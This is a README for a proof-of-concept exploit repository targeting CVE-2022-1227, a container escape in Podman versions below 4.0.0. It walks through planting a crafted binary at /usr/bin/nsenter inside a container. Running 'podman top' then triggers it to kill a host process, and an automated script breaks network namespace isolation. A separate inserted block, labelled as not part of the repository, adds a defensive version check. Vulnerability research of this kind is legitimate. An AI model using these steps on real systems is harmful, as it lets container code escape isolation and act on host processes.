iridium-soda/CVE-2022-1227_Exploit
CVE-2022-1227_Exploit

A script for exploiting CVE-2022-1227.

Background

  • Ubuntu 20.10 is recommended.
  • Podman < 4.0.0 is affected; 3.4.4 is recommended.

TODO: explain the principle behind this vulnerability

Install podman

Follow the instructions in the official documentation: https://podman.io/getting-started/installation#installing-on-linux

For Ubuntu 20.10, the install command should be:

sudo apt-get install podman=3.4.4+ds1-1ubuntu1
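Before relying on podman top on a host, a defender will want to confirm that the installed Podman is outside the range the Background section lists as affected (< 4.0.0). The POSIX shell check below is an added example, not code from this repository; it assumes `podman --version` prints `podman version X.Y.Z`, and it strips the Ubuntu package suffix seen in the install command above before comparing.

```shell
#!/bin/sh
# Added example (not part of this repository): check whether an installed Podman
# falls inside the range the README gives as affected (< 4.0.0).

# Reduce a packaged version string to its upstream x.y.z part:
# "3.4.4+ds1-1ubuntu1" -> "3.4.4", "v4.1.0" -> "4.1.0".
upstream_version() {
    printf '%s\n' "$1" | sed -e 's/^v//' -e 's/[+~-].*$//'
}

# version_lt A B: exit 0 if A < B, 1 if A >= B, 2 if a component is not numeric.
# Components are compared numerically so that 3.10.0 > 3.9.0 (a plain string
# comparison would get that wrong); missing trailing components count as 0.
version_lt() {
    a="$(upstream_version "$1")."
    b="$(upstream_version "$2")."
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; a=${a#*.}
        y=${b%%.*}; b=${b#*.}
        x=${x:-0}; y=${y:-0}
        case "$x$y" in *[!0-9]*) return 2 ;; esac
        [ "$x" -lt "$y" ] && return 0
        [ "$x" -gt "$y" ] && return 1
    done
    return 1
}

# is_affected_podman_version V: exit 0 when V is below the fixed release 4.0.0.
is_affected_podman_version() {
    version_lt "$1" "4.0.0"
}

# Query the installed binary. Assumption: `podman --version` prints
# "podman version X.Y.Z", so the last whitespace-separated field is the version.
check_installed_podman() {
    ver=$(podman --version 2>/dev/null | awk '{print $NF}')
    if [ -z "$ver" ]; then
        echo "podman not found on PATH"
        return 2
    fi
    if is_affected_podman_version "$ver"; then
        echo "podman $ver is in the affected range (< 4.0.0); upgrade before using podman top"
        return 0
    fi
    echo "podman $ver is outside the affected range"
    return 1
}
```

Run `check_installed_podman` on the host; an exit status of 0 means the installed version is still in the affected range.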

Quick Start

Simple Exploit

In this section we try a simple PoC that breaks the boundary of the PID namespace and kills a process on the host.

Here are the steps:

  1. Start a container with the following command: podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity

  2. Run keep from ./exp/bin and note the PID it prints on the terminal. The binary sleeps for 600 seconds, so you must finish the following steps within that window.

    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
    My process ID is: 7719
    Put this number to `PID` in the sendsig.c and compile!
    
  3. Edit the source code in ./exp/src/sendsig.c and set the variable pid to the PID obtained in the previous step, i.e. change

    int pid = OLD_VAL;

    to

    int pid = 7719;

  4. Copy the compiled binary into the container at /usr/bin/nsenter (where $container_name is the container started in step 1): podman cp ./exp/bin/sendsig $container_name:/usr/bin/nsenter

  5. Run podman top to trigger the vulnerability: podman top -l

  6. If everything goes right, the running keep process is killed immediately. This is unusual: normally, processes inside the container cannot send signals to processes on the host because of PID namespace isolation.

    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
    My process ID is: 7719
    Killed
    

Full exploit

In this section we use sockets to set up inter-process communication between a client in the container and a server on the host, which is normally impossible while the isolation mechanism is intact. The vulnerability is used to break through the network namespace isolation and complete this exploit.

First, enter the directory: cd ./exp

Then run ./exploit.sh; everything is done automatically. If everything goes right, the server displays:

Hello from the container!

This means we have crossed the network namespace and escaped.
